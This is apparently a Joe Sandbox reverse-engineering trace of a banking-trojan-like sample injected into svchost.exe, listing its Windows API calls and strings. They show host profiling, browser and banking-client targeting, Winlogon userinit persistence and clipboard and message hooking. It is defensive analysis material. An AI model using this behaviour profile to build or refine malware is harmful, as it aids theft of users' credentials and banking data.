                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5547
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5572
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5581
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5595
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB55A8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55BC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55C9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB55D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55EA
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55FE
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB560B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02BB561B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB562C
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB566C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB567B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB568C
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02BB569F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB56B3
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56C0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB56D0
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56E1
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BB56F3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5707
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5714
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02BB5724
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5735
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5760
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB576F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5783
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5796
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57AA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57B7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB57C7
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57D8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57EC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB57F9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02BB5809
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB581A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB5820
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB5843
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5875
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5884
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5895
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB58A8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB58BC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58C8
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB58D8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58E6
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,75573490), ref: 02BB4987
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,75573490), ref: 02BB419D
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,75573490), ref: 02BB450E
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,75573490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB5924
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                                • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                                • API String ID: 2738427392-2715564829
                                                                                                                                                                                                                • Opcode ID: b62a16d44b0a8ae23f7bbeec78d43a0be3e2d9dcbf744c79f8e2c8b5eefaa1c3
                                                                                                                                                                                                                • Instruction ID: 5ccde02bcb3cefbc70dc628a6fa62c2e70b19bc150c9d82681cc1931ee991ba1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62a16d44b0a8ae23f7bbeec78d43a0be3e2d9dcbf744c79f8e2c8b5eefaa1c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFA2FA70A81318BEFB619B948C4AFEE7B78EF45B04F604584F341BA1C0D7F46A458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC6CAE
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02BC6CC0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02BC6CCB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC6CDF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC6CFB
                                                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 02BC6D05
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 02BC6D3D
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB68), ref: 02BC6D65
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC6D86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6DA4
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6DC5
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6DDF
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC6DE9
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC3530,00000000,00000000,00000000), ref: 02BC6E38
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6E4C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6E5D
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC7DD0,00000000,00000000,00000000), ref: 02BC6E8C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6EA0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6EB1
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC8080,00000000,00000000,00000000), ref: 02BC6EC6
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,9E938F4Aa), ref: 02BC6ED6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6EF6
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6F17
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(9E938F4Aa,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6F34
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC6F3E
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB80), ref: 02BC6F49
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC79D0,00000000,00000000,00000000), ref: 02BC6F5B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6F6B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6F7C
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,75570F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC6970,00000000,00000000,00000000), ref: 02BC6F91
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FA1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6FB2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC54B0,00000000,00000000,00000000), ref: 02BC6FDC
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FF0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7001
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7010
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC7013
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7020
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC7023
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BC7047
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BC7059
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02BC7065
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC7074
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02BC7090
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02BC70B7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\java.exe), ref: 02BC70CD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02BC70E3
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02BC70F9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02BC710F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02BC7125
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02BC713B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02BC7151
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02BC7167
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02BC717D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02BC7193
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02BC71A9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02BC71BF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC71D5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BC71EB
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB8F0,00000000,00000000,00000000), ref: 02BC7219
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7233
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7240
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCEF80,00000000,00000000,00000000), ref: 02BC7255
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7269
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7276
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0560,00000000,00000000,00000000), ref: 02BC728B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC729F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC72AC
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0E20,00000000,00000000,00000000), ref: 02BC72C1
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC72D5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC72E2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCF6A0,00000000,00000000,00000000), ref: 02BC72F7
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC730B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7318
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCCB80,00000000,00000000,00000000), ref: 02BC732D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7341
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC734E
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCCC20,00000000,00000000,00000000), ref: 02BC7363
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7377
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7384
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD1590,00000000,00000000,00000000), ref: 02BC7399
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73AD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC73BA
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD24D0,00000000,00000000,00000000), ref: 02BC73CF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73E3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC73F0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD31C0,00000000,00000000,00000000), ref: 02BC7405
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7419
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7426
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD32B0,00000000,00000000,00000000), ref: 02BC743B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC744F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC745C
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCFE80,00000000,00000000,00000000), ref: 02BC7471
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7485
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7492
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3480,00000000,00000000,00000000), ref: 02BC74A7
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74BB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC74C8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD43F0,00000000,00000000,00000000), ref: 02BC74DD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74F1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC74FE
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD47D0,00000000,00000000,00000000), ref: 02BC7513
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7527
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7534
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02BC5757
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD19A0,00000000,00000000,00000000), ref: 02BC7549
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC755D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC756A
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD1C80,00000000,00000000,00000000), ref: 02BC757F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7593
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC75A0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BB80C0,00000000,00000000,00000000), ref: 02BC75B5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC75CD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC75E6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02BC75FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02BC7613
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02BC7625
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02BC7637
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02BC7649
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\core.exe), ref: 02BC765B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02BC766D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02BC767F
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02BC76EC
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC76FB
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC7714
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC771B
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC7731
